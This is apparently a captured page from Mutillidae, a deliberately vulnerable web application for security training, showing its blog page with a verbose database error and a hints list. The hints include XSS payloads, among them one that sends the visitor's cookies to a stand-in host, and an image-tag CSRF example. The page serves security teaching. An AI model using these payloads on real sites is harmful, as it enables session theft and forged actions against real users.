Mutillidae: Born to be Hacked
Version: 2.1.19 Not Logged In
Home Login/Register Toggle Security Reset DB View Log View Captured Data

OWASP
Site hacked...err...quality-tested with Samurai WTF, Backtrack, Firefox, Burp-Suite, Netcat, and these Mozilla Add-ons
 
 
Twitter
@webpwnized
 
YouTube
Mutillidae
Channel
 
Developed by Adrian "Irongeek" Crenshaw and Jeremy Druin
Welcome To The Blog
Add New Blog Entry
View Blogs
Add blog for anonymous
Note: <b>,</b>,<i>,</i>,<u> and </u> are now allowed in blog entries
 
Error: Failure is always an option and this situation proves it
Line285
Code0
File/var/www/mutillidae/add-to-your-blog.php
MessageError: Table 'metasploit.blogs_table' doesn't exist
Trace#0 /var/www/mutillidae/index.php(469): include() #1 {main}
Diagnotic InformationSELECT * FROM blogs_table WHERE blogger_name like 'anonymous%' ORDER BY date DESC LIMIT 0 , 100
Did you setup/reset the DB?
 
 
 
CSRF Protection Information
Posted Token:
Expected Token For This Request:
Token Passed By User For This Request:
 
New Token For Next Request: 5323
Token Stored in Session: 5323
Hints
  • For XSS:XSS is easy stuff. This one shows off both reflected (you see the results instantly) and stored (someone can run across it later in another app that uses the same database). "<script>alert("XSS");</script>" is the classic, but there are far more interesting things you could do which I plan show in a video later.
  • For some hot cookie stealing action, try something like: <script> new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie); </script>
  • Check out Rsnake's XSS Cheet Sheet for more ways you can encode XSS attacks that may allow you to get around some filters.
  • For CSRF:You can create another page someplace and make a link to an image that is not an image. You can also send someone an HTML email with a link inside. Sending links over HTML aware Instant Messaging like Communicator also works. One of the quietest methods is to use HTML injection to poison a web page thus creating a persistant attack. When a user visits the poisoned page, their browser will reach out to the targe page. Using an AJAX request can keep the rouge tranaction silent. You could use something like the following:
    <img src="http://localhost/mutillidae/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy">
    This is the easy way to do CSRF with the GET method. Login as someone, make your page with the link image someplace else, and then view it. You should now see something new on the comment wall.
  • For Cross Site Request Forgery, a tool like the Social Engineering Toolkit by Dave Kennedy can help.
  • One interesting concept is injecting server side code. Talk about ownage. This requires very special circumstances though. Essentially you need the concept of "eval()" happening on the server-side. In Oracle and SQL Server this command is "EXEC". In JavaScript the command is "eval()". In PHP and ASP look for "include()". In ColdFusion the tag fulfills this purpose. Eval() is the opposite of encoding. It takes a text context and transforms text into an execution context. Encoding takes potetially dangerous code that could execute and renders it harmless.
Browser: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
PHP Version: 5.2.4-2ubuntu5.10
The newest version of Mutillidae can downloaded from Irongeek's Site